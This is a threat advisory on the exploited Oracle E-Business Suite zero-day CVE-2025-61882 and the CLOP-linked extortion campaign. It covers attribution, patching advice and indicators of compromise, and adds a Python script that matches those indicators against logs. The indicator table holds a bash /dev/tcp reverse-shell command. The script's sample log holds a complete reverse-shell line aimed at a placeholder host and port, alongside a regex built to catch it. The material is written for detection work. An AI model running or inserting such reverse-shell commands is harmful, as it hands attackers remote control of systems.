Oracle E-Business Suite Zero-Day Vulnerability (CVE-2025-61882)

October 6, 2025

THE THREAT

On October 4, 2025, Oracle released a security advisory addressing a critical zero-day vulnerability impacting its E-Business Suite (EBS), identified during Oracle's investigation into the recently disclosed extortion campaign targeting EBS customers. CVE-2025-61882 (CVSS 9.8) resides in the BI Publisher Integration of the Oracle Concurrent Processing component of EBS. It allows an unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful exploitation gives the attacker complete control over the product, i.e. Remote Code Execution (RCE) on the EBS application tier.

Oracle released the advisory following Google Threat Intelligence Group's (GTIG) disclosure of an extortion email campaign likely tied to the CLOP (aka Cl0p, FIN11, TA505) data theft and extortion group. Although CLOP is suspected of running the campaign, a second group, Scattered LAPSUS$ Hunters, has also claimed involvement: it published Proof-of-Concept (PoC) exploit code on Telegram and stated that its exploit had been leaked and sold to CLOP.

Given the active exploitation of CVE-2025-61882, involvement of a well-known extortion threat group, and public availability of the PoC exploit code, it is critical that organizations apply the relevant security patches immediately and upgrade to Oracle EBS's latest secure version.

What we're doing about it

What you should do about it

Additional information

Researchers from GTIG identified a "high-volume extortion campaign," observing extortion emails dated around September 29th, 2025. These emails, which were sent to executives from various organizations, alleged that the threat actor had breached their Oracle EBS systems and exfiltrated sensitive data. GTIG uncovered connections between the extortion campaign and the CLOP threat actor group. This group is well-known for conducting extortion campaigns by leveraging compromised email accounts. At least one email address associated with the group was identified from the observed extortion note.

Shortly after GTIG's update, Oracle confirmed the legitimacy of the extortion campaign, indicating that vulnerabilities addressed in its July 2025 Critical Patch Update had been exploited, without naming the specific vulnerabilities. On October 4, 2025, Oracle disclosed that CVE-2025-61882 had been exploited in the extortion campaign and released patches for it. The flaw has low attack complexity and requires neither authentication nor user interaction, so it can be exploited remotely by an unauthenticated attacker who can reach the EBS web tier over HTTP. Oracle's advisory also lists the IoCs observed during the investigation into the extortion campaign.

Google Mandiant's Chief Technology Officer, Charles Carmakal, stated that the CLOP group exploited vulnerabilities in Oracle EBS in August 2025, including both the flaws patched in July 2025 and CVE-2025-61882. Oracle has not confirmed which of the July vulnerabilities were exploited, but three of those disclosed can be exploited remotely: CVE-2025-30745, CVE-2025-30746, and CVE-2025-50107.

Despite Scattered LAPSUS$ Hunters' claim that CLOP stole its exploit, there is concern that the two groups may be collaborating on a widespread extortion campaign. Scattered LAPSUS$ Hunters has indicated its intention to target Oracle EBS with another exploit, which it describes as a "better chained version that exploits EBS".

As PoC exploit code for CVE-2025-61882 is publicly available, it is highly likely that other threat actors will target vulnerable instances in the near future. Given the criticality of CVE-2025-61882, the scope of the extortion campaign, and the public PoC, organizations should patch this flaw and the other potentially exploited vulnerabilities to mitigate the risk of exploitation. Organizations that have received the extortion emails are encouraged to investigate for a breach, report the extortion attempt to law enforcement, and avoid paying ransom demands, as payment does not guarantee that the threat actors will delete stolen data.

Impacted Versions List:

Indicators of Compromise (IOCs)

Indicator                                                          Type
200[.]107[.]207[.]26                                               IP Address
185[.]181[.]60[.]11                                                IP Address
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d   SHA-256
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121   SHA-256
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b   SHA-256
sh -c /bin/bash -i >& /dev/tcp// 0>&1                              Command

The IP addresses are defanged ("[.]" in place of "."). The command indicator is reproduced as published, with the reverse-shell listener host and port removed from the /dev/tcp path.
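The script below is an added example, not part of the original advisory and not Oracle's or GTIG's tooling, showing how the indicators above can be checked against local telemetry. It re-fangs the IP addresses and matches them against web-server access log lines, matches the bash /dev/tcp reverse-shell idiom in process-audit events (generalised so that a variant pointing at any listener host and port still fires, not only the published form with the host and port removed), and intersects a list of observed SHA-256 digests with the hash indicators. The access log format (Apache/OHS combined style), the `cmd="..."` process-audit format, and all sample log lines are constructed for the example.

```python
"""Match the CVE-2025-61882 advisory IoCs against local telemetry (added example)."""
from __future__ import annotations

import hashlib
import re
from typing import Iterable

# Indicators as published in the advisory, kept in their defanged form.
DEFANGED_IPS = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
SHA256_IOCS = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}


def refang(indicator: str) -> str:
    """Turn the publication-safe '1[.]2[.]3[.]4' form back into a matchable address."""
    return indicator.replace("[.]", ".")


IP_IOCS = {refang(ip) for ip in DEFANGED_IPS}

# The published command IoC is 'sh -c /bin/bash -i >& /dev/tcp// 0>&1' with the
# listener host and port removed. This pattern matches the bash /dev/tcp reverse
# shell idiom with any (or no) host/port, so a rebuilt variant still fires.
REVERSE_SHELL_RE = re.compile(r"(?:ba)?sh\s+-i\s*>&\s*/dev/tcp/[^\s/]*/\S*\s+0>&1")

# Assumed Apache/OHS combined-log style line: the client IP is the first field.
ACCESS_LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3})')
# Assumed process-audit format: key=value pairs with the command line quoted.
PROCESS_CMD_RE = re.compile(r'cmd="([^"]*)"')


def scan_access_log(lines: Iterable[str]) -> list[tuple[int, str, str]]:
    """Return (line_no, client_ip, request) for requests from the listed IPs."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_LINE_RE.match(line)
        if m and m.group(1) in IP_IOCS:
            hits.append((n, m.group(1), m.group(2)))
    return hits


def scan_process_log(lines: Iterable[str]) -> list[tuple[int, str]]:
    """Return (line_no, command) for process events spawning a /dev/tcp reverse shell."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = PROCESS_CMD_RE.search(line)
        if m and REVERSE_SHELL_RE.search(m.group(1)):
            hits.append((n, m.group(1)))
    return hits


def sha256_of_file(path: str) -> str:
    """Stream-hash a file so large artifacts need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_hits(digests: Iterable[str]) -> set[str]:
    """Intersect observed SHA-256 digests (e.g. an EDR export) with the IoC hashes."""
    return {d.lower() for d in digests} & SHA256_IOCS


# Constructed sample telemetry so the example runs offline; not real customer data.
SAMPLE_ACCESS_LOG = """\
200.107.207.26 - - [29/Sep/2025:10:14:03 +0000] "POST /OA_HTML/ HTTP/1.1" 200 512
198.51.100.7 - - [29/Sep/2025:10:14:05 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 1024
185.181.60.11 - - [29/Sep/2025:10:15:40 +0000] "GET /OA_HTML/ HTTP/1.1" 404 211
"""
SAMPLE_PROCESS_LOG = """\
2025-09-29T10:16:02Z host=ebs-app-01 user=applmgr cmd="sh -c /bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"
2025-09-29T10:16:10Z host=ebs-app-01 user=applmgr cmd="sh -c ls -la /tmp"
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG.splitlines()):
        print("IoC IP hit:", hit)
    for hit in scan_process_log(SAMPLE_PROCESS_LOG.splitlines()):
        print("reverse shell hit:", hit)
    print("hash hits:", hash_hits(["76B6D36E04E367A2334C445B51E1ECCE97E4C614E88DFB4F72B104CA0F31235D"]))
```

Feed `scan_access_log` the web tier's access logs going back to at least the start of August 2025 (the period in which Carmakal reports exploitation began), and run `sha256_of_file` over recently modified files under the EBS application tier before passing the digests to `hash_hits`; a hit on any indicator should be treated as grounds for a full incident investigation rather than a patch-and-move-on.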

References:

[1] https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-61882
[3] https://www.cyber.gc.ca/en/guidance/profile-ta505-cl0p-ransomware
[4] https://www.resecurity.com/blog/article/trinity-of-chaos-the-lapsus-shinyhunters-and-scattered-spider-alliance-embarks-on-global-cybercrime-spree
[5] https://www.linkedin.com/posts/austin-larsen_threatintelligence-cybersecurity-clop-activity-7379316941762727936-h8sR/
[6] https://www.linkedin.com/feed/update/urn:li:activity:7379498157208027136/
[7] https://nvd.nist.gov/vuln/detail/CVE-2025-30745
[8] https://nvd.nist.gov/vuln/detail/CVE-2025-30746
[9] https://nvd.nist.gov/vuln/detail/CVE-2025-50107
